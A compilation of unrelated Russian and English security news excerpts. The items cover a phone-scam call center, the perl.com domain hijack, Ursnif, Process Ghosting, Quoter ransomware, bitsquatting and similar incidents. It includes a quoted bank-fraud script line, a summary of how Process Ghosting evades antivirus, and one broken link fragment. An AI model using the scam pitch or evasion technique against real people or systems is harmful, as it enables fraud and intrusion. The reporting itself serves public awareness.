Об этом указывали записи на информационной доске, где был написан план на день, который составляет 200 тысяч рублей - и показатели, кто сколько завел денег. Артем и еще одна коллега Аня смогли сделать по 170 тысяч.
С каждой сделки ребята заработали по 7,5% от суммы сделки, что эквивалентно 4 652 грн - практически минимальная зарплата за один рабочий день, и это не считая еженедельной ставки в 100 долларов.
Обе "сделки" удалось провернуть благодаря "разводу на кредит".
Легенда такова. Якобы недобросовестные сотрудники "Сбербанка" оформили на вашу карту кредит, и чтобы его аннулировать, нужно взять еще один кредит и перевести деньги на специальный счет. Стандартная сумма кредитования как раз составляет 170 тысяч рублей.
Соответствующие спичи есть в методичке: "Уважаемый клиент, также в данный момент по системе нашего банка отображается заявка на потребительский кредит от нашего банка, я так понимаю, что за последние сутки заявок на кредит вы не делали".
Далее аферист скажет, что клиенту выдан кредит мошенническим путем и он сейчас переведет вас на другого сотрудника банка. Это создает у жертвы иллюзию "большой компании", в которой работает много людей.
Но вернемся к работе офиса интернет-мошенников. За час до конца рабочего дня здесь стали твориться настораживающие вещи. Сначала приехал парень кавказской внешности. Он представился как Александр и сказал, что якобы забыл в офисе зарядку.
После него явилась девушка по имени Мария - я ее видел еще в момент, когда только пришел в офис. Она представилась как помощница Михаила, а потом ушла.
Теперь она вернулась и отвела меня в отдельную комнату, где вместе с кавказцем мне устроили допрос. Они снова спросили меня, где я работал.
Я повторил историю, которую ранее рассказал Михаилу, но Мария заявила, что видела меня по телевидению и ей кажется, что я работаю в издании "Страна.ua". Но я убеждал их в том, что они обознались.
Стало очевидно, что пора уходить. Я сказал, что у меня в автомобиле лежит паспорт - и сейчас я его принесу, чтобы окончательно расставить все точки над "и". Но понятно, что больше я туда не возвращался.
Но вывод понятен: у компаний-мошенников есть свои службы безопасности. И они проверяют новых сотрудников.
То есть бизнес серьезный. И вряд ли он мог бы существовать, не имея "крыши" в силовых структурах.
• Video: https://t.me/stranaua/18166
• Source: [https://strana.news/articles/rassle...jat-na-denhi-klientov- rossijskikh- bankov.html](https://strana.news/articles/rassledovania/355432-kak-rabotajut- v-ukraine-koll-tsentry-kotorye-razvodjat-na-denhi-klientov-rossijskikh- bankov.html)
In an incident report published on Friday, Google said that a Google Voice outage affecting a majority of the telephone service's users earlier this month was caused by expired TLS certificates.
This worldwide
outage
prevented most Google Voice users from logging into their accounts and using
the service for more than four hours between February 15th and February 16th,
2021.
"Google Voice users experienced an issue in which some new inbound or outbound
Voice over Internet Protocol (VoIP) calls failed to connect, for a total
duration of 4hours 22 minutes," the incident report reads.
"Peak impact occurred at approximately 03:00, at which time mitigation efforts
began to reduce failure rates."
During regular operation, voice calls made through Google Voice are controlled using the Session Initiation Protocol (SIP), with client devices immediately retrying their connection to the service once it breaks.
Transport Layer Security (TLS) certificates used to encrypt all Google Voice traffic are also rotated regularly to keep the connections and traffic secure.
"Due to an issue with updating certificate configurations, the active certificate in Google Voice frontend systems inadvertently expired at 2021-02-15 23:51:00, triggering the issue," Google explained.
"During the impact period, any clients attempting to establish or reestablish an SIP connection were unable to do so."
After the expired certificates triggered the outage, users could not access the Google Voice service to make or receive VoIP calls.
However, client devices that already had an active SIP connection before the
incident were unaffected during the outage (as long as the connection was not
interrupted).
"After investigating, the engineering team determined that certificate
configuration was the root cause," Google added. The team generated updated
certificates and configuration information and began an emergency rollout of
this data to frontend systems."
After rolling out the mitigation, affected Google Voice SIP clients restored
functionality after retrying their connection to the service.
The Google engineering team is taking several actions designed to prevent a similar issue from occurring again and decrease the impact of future outages.
As the Google Workspace Team that published the incident report said, the engineers are taking the following measures:
In December 2020, Google suffered a global authentication system outage that affected most of its consumer-facing services, including Gmail, YouTube, Google Drive, Google Maps, and Google Calendar.
As Google explained later that month, that incident was caused by a bug in the automated quota management system, which blocked users from logging into their accounts and authenticating to Google Cloud services.
Неизвестные злоумышленники «угнали» домен perl[.]com, принадлежащий Тому Кристиансену (Tom Christiansen), который использует его с 1997 года для размещения новостей и статей о языке Perl.
Первым проблему с сайтом на прошлой неделе заметил его редактор Брайан Ди Фой, который написал в Twitter, что домен неожиданно оказался зарегистрирован неизвестным лицом.
Вскоре адвокат Джон Беррихилл, специализирующийся на вопросах интеллектуальной собственности, ответил на этот пост, сообщив, что домен был украден еще в сентябре 2020 года, когда он был связан с регистратором Network Solutions. Затем, во время рождественских праздников, домен был передан регистратору в Китае и, наконец, 27 января 2021 года он перешел к регистратору Key-Systems. Только после этого IP-адрес, назначенный домену, был изменен с 151.101.2.132 на IP-адрес Google Cloud — 35.186.238 [.]101.
[](https://xakep.ru/wp- content/uploads/2021/02/338308/perl-domain-transfers.jpg)
В настоящее время посетителей сайта встречает пустая страница, код которой содержит скрипты, характерные для припаркованного домена Godaddy, хотя на самом деле тот зарегистрирован у key-systems[.]net
Ди Фой пишет, что пока контент perl[.]com был временно перенесен на https://perldotcom.perl.org/, и советует пока не использовать perl[.]com в качестве зеркала CPAN.
Также Ди Фой сообщил журналистам издания Bleeping Computer, что учетная запись владельца домена не была взломана, и сейчас эту проблему решают совместно со специалистами Network solutions и Key-Systems:
«Я напрямую общался с Network solutions и Key-Systems и знаю, что они работают над этим, и пока домен perl.com заблокирован. Том Кристиансен, его законный владелец, сейчас проходит процедуру восстановления [доступа], работая с этими регистраторами».
Click to expand...
Часть участников дискуссии задалась вопросом, почему разработчик не оплатил домен до истечения сроков его использования. На это ответил Питер Кравчик, отметивший, что доступ к домену должен был пропасть лишь в августе 2029 года. Таким образом, ситуация с perl.com выходит за рамки обыкновенной человеческой невнимательности.
Интересно, что IP-адрес, который сейчас связан perl[.]com, давно используется в рамках вредоносных кампаний. Так, в 2019 году IP-адрес 35.186.238[.]101 был привязан к домену, распространяющему исполняемый файл для ныне не существующего шифровальщика Locky. А недавно была замечена похожая на рекламный кликер малварь (VirusTotal), использующая управляющие серверы на www.supernetforme[.]com и www.superwebbysearch[.]com , и оба этих домена так же резолвились на 35.186.238[.]101.
[](https://xakep.ru/wp- content/uploads/2021/02/338308/perl-nslookup.jpg)
Когда малварь пытается подключиться к URL-адресам этих доменов, она получает те же скрипты припаркованных доменов, которые в настоящее время используются на perl[.]com. Хотя эти HTML-ответы не и похожи на инструкции управляющего сервера, они могут свидетельствовать, о том, что данный IP-адрес находится под контролем другого хакера.
Исследователи Avast предупреждают, что известный банковский троян Ursnif продолжает атаковать пользователей по всему миру. Уже несколько лет он распространяется через фишинговые письма, написанные на разных языках.
В отличие от других банкеров, Ursnif устанавливается на устройство жертвы лишь после скачивания бэкдора, позволяя атакующим обойти привычные защитные механизмы и получить высокий уровень доступа к системе, сети или программам.
Ursnif представляет собой так называемое «бесфайловое вредоносное ПО», то есть почти не оставляет следов в системе. Поскольку Ursnif устанавливается после бэкдора и для активации он должен получить информацию через C&C-сервер, он может часами оставаться незамеченным, пока в итоге не начнет вредоносную активность.
Ursnif способен не только похищать банковские данные, но также может получить доступ к некоторым электронным письмам и браузерам жертвы, а также добраться до криптовалютного кошелька.
«Механизмы скрытного обхода инструментов безопасности были сделаны довольно изобретательно. Это может оказаться особенно эффективной тактикой против устройств, которые не имеют усиленных уровней безопасности, например, детектирования подозрительного поведения, – отмечает Михал Салат, директор департамента по исследованию угроз Avast. – Эти атаки еще раз доказывают, что человек – самое слабое звено в системе. Необходимо помнить о том, что открывать письма с вложением от неизвестных отправителей и нажимать на ссылки – опасно. Если пользователь уже совершил ошибку и открыл письмо, поможет только отключение макроса в документе».
Click to expand...
В процессе анализа исследователи Avast обнаружили банковские реквизиты, платежную информацию, логины, пароли и данные кредитных карт, которые, как выяснилось, были украдены операторами Ursnif.
Исследователи сообщают, что в последнее время главной целью Ursnif были итальянские банки: злоумышленники атаковали пользователей более 100 банков и похитили более 1700 учетных данных только для одного оператора платежей.
Специалисты Avast уже уведомили об атаках банкам и платежные сервисы, которые удалось идентифицировать, а также сообщили о происходящем итальянский CERTFin и государственным службам, обрабатывающим финансовую информацию.
Источник: xakep.ru/2021/03/09/ursnif-italy/
Жителя американского Лаббока (штат Техас) обвинили в мошенничестве в особо
крупном размере после того, как обнаружили у него данные двух миллионов
кредитных карточек. По данным портала
Everything Lubbock, 44-летний Майкл Мирис (Michael Meares) был арестован у
себя дома, после чего жюри округа предъявило ему официальные обвинения.
В судебных протоколах говорится, что было составлено несколько отчетов о преступлениях, в которых Мирис фигурировал в качестве подозреваемого. Например, в материалах полицейского управления Лаббока говорится: «Была неподтвержденная информация о том, что Мирис подделывал валюту и кредитные карты». Кроме того, кардера подозревают в употреблении синтетического опиоида фентанила.
На компьютере Мириса нашли электронную таблицу, которая была озаглавлена фразой «Используй эту базу данных для кражи денег с карт». Она содержала имена владельцев счетов, физический и электронный адреса, указания городов, штатов, стран, названия банков, непосредственно номера кредитных карт, даты истечения срока действия и трехзначные коды безопасности. Согласно судебным протоколам, только в одной этой таблице была информация более чем о миллионе счетов.
Кроме того, следователи обнаружили, что еще в 2011 году кардеру удалось получить данные тысяч людей из базы Управления социального обеспечения, в которых в том числе были указаны имена и контрольные номера. Также Мирис обладал базой регистрации транспортных средств, которая содержала сведения о ТС, номера водительских удостоверений и другие персональные данные. Особую обеспокоенность следствия вызвало то, что кардер хранил данные 522 личных дел военных, которые принимали участие во Второй мировой войне. Большая их часть к моменту проведения обысков была мертва, однако не исключено, что Мирис мог получать на их имена федеральные выплаты.
Кардеру предъявлены обвинения в мошенничестве по нескольким пунктам, подделке документов, а также хранении наркотиков. Ему назначен залог в размере 377,5 тысячи долларов, однако на момент публикации он не был внесен.
source: everythinglubbock.com/news/local-news/lubbock-man-caught-in-massive- fraud-close-to-2-million-credit-card-accounts
Хакерская группа BlackShadow атаковала израильского хостинг-провайдера Cyberserve, похитив клиентские базы данных и нарушив работу сервисов компании. Хостер Cyberserve используется различными организациями страны, включая местные радиостанции, музеи и образовательные учреждения.
Издание Bleeping Computer сообщает, что начиная с пятницы, 29 октября 2021 года, при попытке получить доступ к сайтам, размещенным на Cyberserve, посетители сталкивались с ошибками и сообщениями о том, что ресурс недоступен из-за проблем с кибербезопасностью.
[](https://xakep.ru/wp- content/uploads/2021/11/363637/dan-bus.jpg)
Ответственность за случившееся взяла на себя хак-группа BlackShadow, которая теперь вымогает у хостинговой компании и ее клиентов 1 000 000 долларов в криптовалюте, в противном случае угрожая опубликовать украденные во время атаки данные.
Хотя на оплату жертвам отвели 48 часов, хакеры практически сразу слили образец данных, содержащий 1000 записей, очевидно, стремясь подкрепить свои заявления доказательствами. Более того, сообщается, что слив затронул личную информацию пользователей крупного ЛГБТ-сайта под названием Atraf:
«Команда Atraf пока не связалась с нами для заключения каких-либо сделок, поэтому мы выбрали 50 известных израильтян и слили их видео», — сообщают хакеры в Telegram.
Click to expand...
По состоянию на 1 ноября 2021 года многие сайты, размещенные на Cyberserve, по-прежнему были недоступны. Среди других пострадавших ресурсов числятся:
Интересно, что Национальное управление кибербезопасности Израиля сообщило журналистам [The Times of Israel](https://www.timesofisrael.com/israel-cyber- authority-says-it-warned-hosting-company-it-was-vulnerable-to-hack/), что ранее они несколько раз предупреждали Cyberserve о неминуемой атаке. Неясно, проигнорировали ли сотрудники Cyberserve эти предупреждения или попросту не сумели найти уязвимости, которые в итоге эксплуатировали злоумышленники.
Специалисты компании Elastic Security описали новый метод атак под названием Process Ghosting, который потенциально может использоваться хакерами для обхода защиты и выполнения вредоносного кода на системах под управлением Windows.
Process Ghosting представляет собой технику модификации исполняемых файлов, с помощью которой атакующий может записать вредоносный код на диск таким образом, чтобы его было сложно сканировать или удалить. Более того, он позволяет запускать уже удаленные исполняемые файлы.
Новый метод пополнил список известных техник обхода защиты, таких как Process Doppelgänging и Process Herpaderping.
Process Doppelgänging схожа с техникой Process Hollowing (позволяет создать процессы в состоянии ожидания и заменить образ процесса образом, который нужно скрыть). Process Doppelgänging работает путем использования двух ключевых функций для маскировки загрузки модифицированного исполняемого файла. Вредоносный код, используемый в атаке, никогда не сохраняется на диск, благодаря чему его не замечает большинство популярных решений безопасности.
Техника Process Herpaderping позволяет скрыть поведение работающего процесса путем изменения исполняемого файла на диске после того, как он будет проецирован в память.
Как поясняют эксперты, обход работает из-за «промежутка между созданием процесса и уведомлением решений безопасности о его создании», что предоставляет вирусописателям время для модификации исполняемого файла до того, как он будет просканирован защитными продуктами.
Метод Process Ghosting идет еще дальше – он позволяет запускать уже удаленные исполняемые файлы. Техника основана на том, что Windows предотвращает попытки изменить или удалить отображенный файл только после того, как он будет спроецирован в раздел «образа».
«Это значит, что возможно создать файл, пометить его для удаления, спроецировать в раздел образа, закрыть дескриптор файла для завершения удаления, а затем создать процесс из теперь уже бесфайлового раздела. Это и есть Process Ghosting», - пояснили исследователи.
Эксперты продемонстрировали работу метода на примере Windows Defender в сценарии, где «Защитник» пытается открыть вредоносную полезную нагрузку для сканирования, но безуспешно, поскольку файл находится в состоянии удаления. Повторные попытки также оканчиваются неудачно, так как файл уже удален. В результате, полезная нагрузка (ghost.exe) выполняется без проблем.
Исследователи проинформировали команду Microsoft Security Response Center (MSRC) о своих находках в мае нынешнего года, однако в компании заявили, что проблема не соответствует критериям, требующим выпуска обновления безопасности или инструкций по предотвращению атак.
• Source: <https://www.elastic.co/blog/process-ghosting-a-new-executable- image-tampering-attack>
The Biden administration is putting the final touches on an executive order aimed at helping the U.S. defend itself against sophisticated cyberattacks like the one Russian hackers recently leveled against Texas software-maker SolarWinds.
The order, as now written, lays out a series of new requirements for companies that do business with the government. The initiative includes plans for more systematic investigations of cyber events and standards for software development. The idea is to use the federal contracting process to force changes that will eventually trickle down to the rest of the private sector.
"So essentially, federal government procurement allows us to say, 'If you're doing business with the federal government, here's a set of things you need to comply with in order to do business with us,'" Anne Neuberger, the deputy national security adviser for cyber and emerging technology at the White House, told NPR in an exclusive interview.
She says the executive order will "set the goal, give it a timeline and then
establish the process to work out the details" on a handful of cybersecurity
initiatives, from setting up new ways to investigate cyberattacks to
developing standards for software.
The effort is all part of the administration's response to a [recent
cyberattack on a Texas software company called
SolarWinds](https://www.npr.org/2021/04/16/985439655/a-worst-nightmare-
cyberattack-the-untold-story-of-the-solarwinds-hack). Hackers linked to
Russian intelligence compromised one of the company's routine software updates
and used that access to break into about 100 top U.S. companies and about a
dozen government agencies. The hackers roamed around the networks for nine
months before they were finally discovered. It is still unclear whether this
was merely an espionage operation or a precursor for something more sinister.
The hack itself was sophisticated and stealthy. The intruders used novel
techniques and exploited gaps in the nation's current cybersecurity systems.
Among other things, the attack was launched from inside the U.S. on servers
the Russians had rented from places such as Amazon and GoDaddy. By doing that,
the hackers were able to slip past National Security Agency early warning
systems because the NSA is not allowed to conduct surveillance inside the
United States.
"We did a detailed study of SolarWinds and it showed that we have major work to do to modernize our cybersecurity ... to reduce the risk of this happening again," Neuberger said. "And the upcoming executive order is a big part of that."
" It's nobody's job ... to tell us what happened"
Among other things, the order will create something similar to the National Transportation Safety Board, or NTSB, for cyber. Just as the NTSB inspects the wreckage of a plane and recovers black boxes to see if the crash requires a systematic fix, a cyber NTSB would potentially paw through code and data logs to discover the root causes that permitted a successful cyberattack.
"What can we learn with regard to how we get advance warning of such incidents?" Neuberger said. "What allowed it to be successful? Potentially, what allowed it to be broad, if it was, which sectors were affected? Why?"
Alex Stamos is the former chief of security at Facebook. Now he runs the Internet Observatory at Stanford University and says that one of the problems with the country's overall cyber strategy is that there is no one in charge of looking at the big picture. An NTSB for cyber would provide some of that.
"You have the FBI, which is deeply involved in the incident response, but they are there to enforce the law. It's not their job to come up with conclusions for the entire society," he said. "You have DHS's CISA, the Cybersecurity Infrastructure Security Agency, their job is to work on defense. So they're probably the closest of the agencies to this, but they don't have any investigative powers. So we're in this weird position where it's really nobody's job ... to tell us what happened."
Neuberger says the executive order seeks to address that by creating more transparency. "If you or I are going out to buy network management software like SolarWinds and we want to buy the software that is most secure, we have no way of assessing which that is," she said. "And as a result, we have no way of saying, 'you know what? I'm willing to pay $5 more for the more secure software because I don't want to bring more risk into my network.' "
Neuberger said that the administration can remedy that by defining a set of requirements for the way software is built. Federal contractors will have to prove that they have secure practices like separating where they develop software from the internet, and things like requiring proof of multifactor authentication. The administration is trying to change the way we all think of code: It isn't just zeroes and ones — it is critical infrastructure.
"The key here is we can't just expect companies to be motivated to build secure software because it's the right thing to do," said Kiersten Todt, managing director of the Cyber Readiness Institute and a former Obama adviser on cyber issues. "Government has to be working with these companies to tell them what secure software looks like and give them the resources, and incentivize them to do so."
She says consumers have a role to play, too. "If we start incentivizing security, then companies [and] the market will then inherently prioritize it because more people will buy the product," she said. "So there is a very much of a multi-stakeholder collaboration that has to happen here."
And an executive order alone won't do that.
"I think it's a first step," Todt said. "It's definitely not the Holy Grail. It's not a destination. It's the departure point."
Notification required
Another perennial issue is that when companies are hacked in the U.S., a lot of them keep it to themselves. The revelation of a cyberattack often affects confidence, share prices and reputation.
The executive order is seeking to change that. Neuberger said federal contractors will be required to be more open about attacks. "If you're doing business with the federal government, then when you have an incident, you must notify us quickly," she said. "Because we'd like to take that incident and ensure that the tactics, techniques and procedures, the information is broadly shared," she said. Then other companies, presumably, would follow their lead.
The chairman of the Senate Intelligence Committee, Sen. Mark Warner, told the U.S. Chamber of Commerce this week that he's working on a bill that will likely include some sort of "mandatory reporting" of cyber incidents and public-private cyberthreat intelligence sharing. He, too, said it was in response to the attack on SolarWinds.
Sen. Mark Warner, a Democrat from Virginia and chairman of the Senate
Intelligence Committee, speaks during a hearing in Washington, D.C., on April
14.
Graeme Jennings/Bloomberg via Getty Images
But all this is easier said than done.
"The key is going to be in how each of these elements of the executive order are executed," Todt said. "And really how government is going to bring industry in to perform the functions to really look pre-event, middle of event, post-event and how we take those lessons learned and integrate them."
And while you may have never heard of SolarWinds or been affected by that attack, the connected world is increasingly vulnerable. And that is one of the messages the administration is trying to send.
"Cyberthreats loom large in a way that Americans feel," Neuberger said. "Can we trust our water, our power to be resilient? We see small companies being forced to pay a ransom to get their business back up and running. We see school systems' networks down due to criminals. So, those risks touch everyday Americans' lives."
The Biden administration has already leveled sanctions against Russia for the SolarWinds attack. And the White House has said there would be more "seen" and "unseen" responses to the breach. The unseen responses — for example, whether the Biden administration is preparing a reprisal attack against Moscow in cyberspace — was not something Neuberger was willing to talk about.
Users worldwide cannot connect to Pulse Secure VPN devices after a code signing certificate used to digitally sign and verify software components has expired.
As employees return from the weekend, network admins have been reporting [[1](https://community.pulsesecure.net/t5/Pulse-Connect-Secure/Terminal- Service-does-not-work-for-Home-Office/td-p/45272), 2, 3, 4] that users cannot connect to Pulse Secure VPN devices and access internal company resources.
"As of today, staff are no longer accessing our system from home. Normally,
they log on to Pulse Secure via the web interface and then select their PC,
which is then forwarded via the terminal server service," a customer reported
on the Pulse Secure forums.
This issue affects users who attempt to connect to company resources through
their browser, where they are greeted with an error stating, "An unexpected
error has occurred," followed by another error saying, "Detected an internal
error. Please retry. If the issue persists, contact your administrator."
This issue affects users globally and is caused by an expired code-signing
certificate and a bug in the Pulse Secure software that is not properly
verifying that executables are signed.
A code-signing certificate allows developers to digitally sign program's executables so that Windows and end-users can verify that they have not been tampered with by a third party. If a signed executable or DLL is modified somehow, the operating system will no longer consider the program signed and result in warnings or other errors.
When signing an executable, developers can use an optional time-stamping server that adds an authoritative timestamp to a signature, proving when a file was signed by the certificate.
The benefit to timestamps is that it proves that an executable was signed before a certificate expired or revoked. Thus, it allows Windows to consider a file signed even after a certificate becomes invalid.
In a new support bulletin released today, Pulse Secure explains that "multiple functionalities/features fail for End-Users with a Certificate error."
Pulse Secure says that the issue is caused by a bug not correctly verifying that Pule Secure components are signed as it is checking the certificate's expiration date rather than the timestamp on a digitally signed file.
As the code-signing certificate used to sign the file has expired today, the
bug prevents the software from operating correctly, and users are unable to
login to VPN devices.
"The Code sign verification on the Client-Side components fails because the
Certificate expiry time is checked as opposed to the timestamp of the Code
signing," a new Pulse Secure
bulletin
explains.
This bug is affecting users of Pulse Connect Secure (PCC) and Pulse Policy Secure (PPS) products listed below:
- This impacts PCS/PPS.
- This impacts the following releases,
- 9.1R11.x
- 9.1R10.x
- 9.1R9.x
- 9.1R8.x
3. This impacts only Windows End-Points.
4. The following features are impacted:
- Terminal Services.
- JSAM
- HOB
- CTS
- VDI
- Secure Meeting (Pulse Collaboration).
- Host Checker.
- Launching of PDC via browser.
- SAML with External Browser with HC enabled.
Click to expand...
The bug is not affecting users utilizing the Pulse Desktop Client directly,
macOS or Linux users, and versions before 9.1R8.x.
Pulse Secure admins have also discovered that they can resolve the issue by
switching to HTML5 Access profiles for their end-users. Users are also able to
connect to RDP via the Pulse Secure VPN Tunneling feature.
BleepingComputer has reached out to Pule Secure with additional questions but has not heard back at this time.
«Лаборатория Касперского» сообщила, что с декабря 2020 года по настоящее время ранее неизвестный шифровальщик Quoter атакует российские финансовые и транспортные компании, и его жертвами стали уже около 10 организаций. Исследователи считают, что за атакам стоит русскоговорящая группа RTM.
Подготовительная фаза кампании началась еще в середине 2019 года. Первичное заражение происходило через фишинговые письма. Злоумышленники выбирали тему, которая должна была, по их расчетам, заставить получателя открыть письмо, например «Повестка в суд», «Заявка на возврат», «Закрывающие документы» или «Копии документов за прошлый месяц». Если жертва переходила по ссылке или открывала вложение, то на ее устройство загружался троян RTM.
После закрепления в системе и распространения по сети злоумышленники пытались перевести деньги через бухгалтерские программы (посредством подмены реквизитов в платежных поручениях малварью или вручную). Если же злоумышленникам это не удавалось, то они приводили в действие Quoter.

Фрагмент кода малвари
Малварь шифровала данные с помощью криптографического алгоритма AES и оставляла контакты для связи с атакующими. Если жертва не реагировала, злоумышленники сообщали, что готовы выложить в открытый доступ украденную конфиденциальную информацию, и прикладывали доказательства. В качестве выкупа атакующие требовали в среднем около миллиона долларов. Примечательно, что с момента закрепления в системе до применения шифровальщика проходило несколько месяцев.
«Среди особенностей данной кампании можно назвать то, что русскоязычные злоумышленники RTM впервые изменили используемые инструменты, более того, теперь они атакуют российские компании. Последнее — редкость, обычно программы-шифровальщики используются в целевых атаках на организации из других стран», — комментирует Сергей Голованов, ведущий эксперт «Лаборатории Касперского».
Click to expand...
Источник: xakep.ru/2021/03/04/quoter/
Независимый ИБ-специалист, известный как Рэми (Remy), обнаружил, что домены Microsoft не защищены от битсквоттинга. Эксперт проводил свои эксперименты на примере домена windows.com, который может превратиться, например, в windnws.com или windo7s.com в случае переворота битов.
Термином битсквоттинг (англ. Bitsquatting) обозначают разновидность
киберсквоттинга, которая предлагает использовать различные вариации легитимных
доменов (обычно отличающиеся от оригинала на 1 бит).
Использование битсквоттинговых доменов обычно происходит автоматически, когда
с компьютера, на котором произошел переворот битов, делается DNS-запрос.
Фундамент этого исследования строится на том факте, что вся информация, по сути, состоит из нулей и единиц, и то же самое касается доменов. Как известно, биты могут переворачиваться (0 превращается в 1 или наоборот), реагируя космическое излучение, колебания мощности, температуры и так далее. Причем в исследовании 2010 года уже выясняли, что на компьютере с 4 Гб оперативной памяти есть 96% шанс переворота битов в течение трех дней.
«Теперь предположим, что компьютер слишком сильно нагревается, произошла солнечная вспышка или космический луч (совершенно реальная штука) перевернул биты на компьютере, — пишет Рэми. — О нет! Теперь в памяти хранится значение whndows.com, а не windows.com! Что же произойдет, когда придет время установить соединение с этим доменом? Домен не соответствует IP-адресу».
Click to expand...
В итоге Рэми составил список доменов, которые могут образоваться из-за перевернутых битов. Он обнаружил 32 действительных доменных имен, 14 из которых не были зарегистрированы и оказались доступны для захвата.

«Это весьма странный случай, поскольку обычно компании, подобные Microsoft, выкупают такие домены, чтобы предотвратить их использование фишерами. Поэтому я купил их. Все. Примерно за 126 долларов», — рассказывает исследователь.
Click to expand...
Купленные Рэми домены:
windnws.com
windo7s.com
windkws.com
windmws.com
winlows.com
windgws.com
wildows.com
wintows.com
wijdows.com
wiodows.com
wifdows.com
whndows.com
wkndows.com
wmndows.com
Возможно, эта проблема может показаться чисто теоретической, однако ИБ- эксперты не раз сообщали об успешном практическом применении таких атак. К примеру, на Black Hat 2011 был представлен доклад под названием «Bit-squatting DNS Hijacking without Exploitation», в котором исследователь рассказывал о том, как он захватил 31 вариант для восьми легитимных доменов нескольких организаций. И в среднем он насчитал 3434 ежедневных DNS-запроса к этим доменам.
Теперь Рэми проделал то же самое для windows.com. В дополнение к трафику, предназначенному для windows.com, исследователь смог перехватить UDP-трафик, предназначенный time.windows.com, а также TCP-трафик, адресованный различным службам Microsoft, включая Windows Push Notification Services (WNS) и SkyDrive (бывшее название OneDrive).
«Неудивительно, что служба NTP, которая работает на всех Windows-компьютерах в мире с конфигурацией по умолчанию, использующей time.windows.com, генерирует наибольший трафик для перевернутых битов, — пишет Рэми. — Но все равно у меня было много и другого трафика».
Click to expand...
Исследователь пишет, что сама возможность битсквоттинга – это очень тревожный знак, потому что таким образом злоумышленники могут создать множество проблем для безопасности приложений.
Помимо трафика, возникающего из-за перевернутых битов, Рэми обнаружил, что немалое количество запросов, похоже, исходит от пользователей, неправильно вводящих доменные имена. Однако понять, какой именно процент запросов происходит от опечаток, не представляется возможным:
«К сожалению, из-за природы битсквоттинга нет никакого способа проверить, что это не орфографические ошибки. Единственная информация, доступная для исследования — та, что отправляется вместе с запросом (например, заголовок реферера и другие заголовки)».
Click to expand...
Защищаться от битсквоттинговых атак эксперт предлагает несколькими способами. К примеру, компании могут регистрировать домены, которые могут использоваться для битсквоттинга. Чаще всего так и происходит, например, time.apple.com защищен от подобных атак, в отличие от time.windows.com. Также Рэми упоминает ECC-память, которая может помочь защитить компьютеры и мобильные девайсы от проблемы переворота битов.
Представители Microsoft сообщили СМИ, что им «известны общеотраслевые методы социальной инженерии, которые могут использоваться для направления клиентов на вредоносные сайты» и посоветовали пользователям «проявлять осторожность при переходе по ссылкам, открытии неизвестных файлов или принятии передачи файлов».
Источник: xakep.ru/2021/03/05/bitsquatting/
online](https://cybernews.com/security/one-of-the-biggest-android-vpns-hacked- data-of-21-million-users-from-3-android-vpns-put-for-sale-online/), Where is this data, not find
Специалисты зафиксировали 550 сообщений о двойном вымогательстве на сайтах утечек данных различных вымогательских группировок.
В 2020 году операторы вымогательского ПО прибегли к стратегии двойного
вымогательства, в рамках которой злоумышленники крадут незашифрованные файлы
жертв, а затем угрожают опубликовать их, если не будет уплачен выкуп.
Используя данные, собранные с помощью автоматических каналов, специалисты
компании Digital Shadows [зафиксировали](https://www.digitalshadows.com/blog-
and-research/ransomware-analyzing-the-data-from-2020/) 550 сообщений о двойном
вымогательстве на сайтах утечек данных, поддерживаемых более чем десятком
вымогательских группировок.
По словам специалистов, программы-вымогатели теперь являются стандартным
подходом для монетизации скомпрометированных компаний. Как
[обнаружили](https://www.crowdstrike.com/resources/reports/crowdstrike-
services-cyber-front-lines-2020/) эксперты из CrowdStrike, более половины всех
действий ее клиентов были направлены на устранение последствий атак программ-
вымогателей. Количество компаний, ежегодно подвергающихся атакам
вымогательского ПО, остается стабильным — 51% предприятий признали факт атаки
вымогателей за последний год. Три четверти подобных атак успешно шифруют
некоторые данные жертв.
Эксперты также отметили, что 66% от всех уведомлений о программах-вымогателях
поступали от организаций и компаний в Северной Америке.
Согласно отчету Digital Shadows о киберугрозах за третий квартал 2020 года, на
долю операторов Maze приходилась треть всех зафиксированных атак с
использованием программ-вымогателей. В октябре прошлого года группировка
прекратила свою преступную
деятельность, и партнеры Maze перешли на использование вымогательского ПО под
названием Egregor. Предположительно, Egregor представляет собой то же
программное обеспечение, что и Maze и Sekhmet, поскольку они используют
одинаковые записки с требованиями о выкупе, одинаковые названия сайтов
платежей и имеют большую часть одного и того же кода. В последнем квартале
2020 года на долю Egregor приходилась треть атак с использованием вымогателей,
включая атаки на Barnes & Noble
, производителя игр Ubisoft и
Epicor Software.
Digital Shadows отслеживает сайты утечек данных, которые вымогательские группировки используют для публикации украденной информации. По данным компании, на сайты шести Maze, Egregor, Conti, Sodinokibi, DoppelPaymer и Netwalker пришлось 84% взломов в 2020 году.
iPhone в полицейских лабораториях начали жить своей жизнью.
Правоохранительные органы США предупреждают коллег и судебных экспертов о новой проблеме при работе с iPhone, хранящимися для проведения криминалистических экспертиз. По данным внутреннего документа, полученного 404 Media, устройства, которые ранее были изъяты и находились в изолированных условиях, неожиданно перезагружаются, что приводит к усложнению их разблокировки и извлечению данных.
Причина внезапных перезагрузок пока остаётся неясной. Авторы документа, предположительно, сотрудники правоохранительных органов Детройта (Мичиган), выдвигают версию, что Apple могла внедрить новую функцию безопасности в iOS 18. Согласно гипотезе, iPhone могут перезагружаться, если находятся вне зоны действия сотовой сети длительное время. После перезагрузки устройства становятся более защищёнными от инструментов, предназначенных для взлома паролей и извлечения информации.
В документе говорится о необходимости уведомления коллег о ситуации с iPhone, которые перезагружаются в течение короткого времени (возможные наблюдения — в пределах 24 часов) при отключении от сотовой сети. Это особенно актуально для устройств, хранящихся в изолированных условиях для криминалистического анализа. Apple пока не прокомментировала, добавила ли она такую функцию в iOS 18.
Несколько iPhone, находившихся в криминалистической лаборатории в состоянии After First Unlock (AFU), внезапно перезагрузились и утратили данное состояние. Устройства в AFU считаются более доступными для правоохранительных органов с использованием специализированных инструментов взлома устройства. Однако после перезагрузки iPhone перешли в состояние Before First Unlock (BFU), что сделало процесс доступа к данным невозможным с применением текущих технологий.
Напомним, что еще в апреле 2024 года компания по мобильной криминалистике Cellebrite столкнулась с проблемой: значительная часть современных iPhone оказалась недоступной для их инструментов взлома.
Отмечается, что три iPhone, работавших на iOS 18.0, поступили в лабораторию 3 октября. По предположениям экспертов, устройства с iOS 18 могли обмениваться сигналами с другими iPhone, находящимися в хранилище в состоянии AFU. Эта связь могла инициировать команду перезагрузки для тех устройств, которые долгое время не были активны или находились вне сети. Теоретически, это может затронуть не только изъятые устройства, но и личные телефоны судебных экспертов, если они находятся вблизи.
